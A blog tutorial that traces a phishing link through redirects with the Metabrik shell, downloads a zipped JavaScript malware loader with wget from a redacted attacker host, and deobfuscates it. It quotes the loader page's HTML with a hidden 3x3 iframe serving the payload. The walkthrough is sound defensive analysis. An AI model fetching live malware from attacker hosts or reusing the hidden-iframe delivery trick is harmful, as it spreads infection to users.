Deobfuscate JavaScript from the command line made easy

When you work in the security industry, you sometimes receive targeted email attacks. By that, we mean we receive a specially crafted email from a known sender (someone you know and is also working in the security industry), with a subject tied to a work you may be doing, and containing just a link to a document for review. That’s not too bad, but by quickly analyzing the email headers you know the sender is spoofed. Anyway, we wanted to have a look at this nasty link. Who knows, the malware might be new?

Requirements

As always with Metabrik, you have to install the required Briks for the task. Please install The Metabrik Platform first if you don’t have it yet. Once done, you have to load and configure required Briks:

use brik::tool
run brik::tool install client::www
run brik::tool install string::javascript

Ready to start digging

Now you have the base Briks installed, just copy the link and save it to a Variable in The Metabrik Shell:

my $link = 'hxxp://<redacted1>.com/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/'

Chances are this link will redirect a few times before stopping to the malware loader. Use the get Command to analyse what you have in this page:

run client::www get $link

You see, there is a JavaScript redirection pointing to another page on the same website. Let’s see what it shows:

my $link2 = 'hxxp://<redacted1>.com/wt/reports/go.php?p=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/'
run client:www get $link2

As you can see, we now have a 404 error. At the time of writing, the malicious website is not leading us to the malcode anymore. Fortunately, we did took some notes during the first analysis. You will have to trust us when we say that at some point, we came to a final go.php script rendering HTML stating:

<meta http-equiv='refresh' content='3;url=https://www.google.com/drive/'><br><center><b>Only available for Windows</b></center>

No worry, just change the user agent and start again, this time with the trace_redirect Command:

set client::www user_agent "Mozilla/5.0 (Windows NT x.y; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0"
run client::www reset_user_agent
run client::www trace_redirect $link2
[
  {
    code => 302,
    location => "hxxp://<redacted2>.com/s/index.php?q=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
    uri => "hxxp://<redacted1>.com/wt/reports/go.php?p=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
  },
  {
    code => 200,
    uri => "hxxp://<redacted2>.com/s/index.php?q=/88976189rYfhZ2Gt4YzhBrkeSFzi8naiaZFnnNtEzDQAd5kfzRFGz2FkF4Z8HrNbiKzT66hDTZ42Rb6aSAHdkbsS5bRDtsEE5/R29tb1I=/kZYR29tb1I=/",
  },
]

We end up with the target malicious loader link. Let’s save the last element uri key from last run Command into $link3 Variable:

my $link3 = $RUN->[-1]{uri}
run client::www get $link3
{
  code => 200,
  content => "<title>Doc file 'GomoR' doc</title> <body bgcolor='#ffffff'>
<iframe src='https://www.google.com/drive/' height='100%' width='100%' scrolling='no' border=0></iframe>
<iframe src='view/GomoR.doc.zip' height=3 width=3></iframe>
<meta http-equiv='refresh' content='5;url=https://www.google.com/drive/'>",
  headers => {
    "client-date" => "Mon, 13 Feb 2017 07:20:55 GMT",
    "client-peer" => "XX.YY.ZZ.79:80",
    "client-response-num" => 1,
    "connection" => "close",
    "content-encoding" => "gzip",
    "content-length" => 206,
    "content-type" => "text/html; charset=UTF-8",
    "date" => "Mon, 13 Feb 2017 07:20:54 GMT",
    "server" => "Apache",
    "vary" => "Accept-Encoding",
  },
}

The code is not far away now. There is this relative URL named view/GomoR.doc.zip from the URI hxxp://<redacted2>.com/s/. Let’s download the code with wget:

wget 'hxxp://<redacted2>.com/s/view/GomoR.doc.zip'

Now for the fun part

Let’s have a look at this so-called ZIP file with file::type Brik:

use file::type
run file::type get_types GomoR.doc.zip
mkdir zip
cd zip/
unzip ../GomoR.doc.zip
ls GomoR.doc.*
run file::type get_types $RUN

As it appeared as a legit ZIP file, we unzipped it and then analyzed files contained in the archive. We have a .js. This is our malcode loader. Let’s show it:

less GomoR.doc.js

Typical obfuscated JavaScript code. As we are lazy and don’t want to do the manual deobfuscation, let’s use the file::text Brik along with string::javascript Brik:

use file::text
use string::javascript
run file::text read GomoR.doc.js
run string::javascript deobfuscate $RUN

It is nearly readable. Save it to a file and display it with less:

run file::text write $RUN gomor.js
less gomor.js

Far better. We finally have the link to our malicious code \o/

Conclusion

We have shown how to use The Metabrik Platform as the primary way of digging into a suspicious link. Now, we want to dig into this executable and we, of course, have Briks for that. Well, sort of. Some are not yet written but in the pipe. Come see us at next TROOPERS conference, we have been scheduled for a one hour talk and we will demonstrate what can be done to reverse engineer (or at least dig a little bit into the malware) with no l33t skills.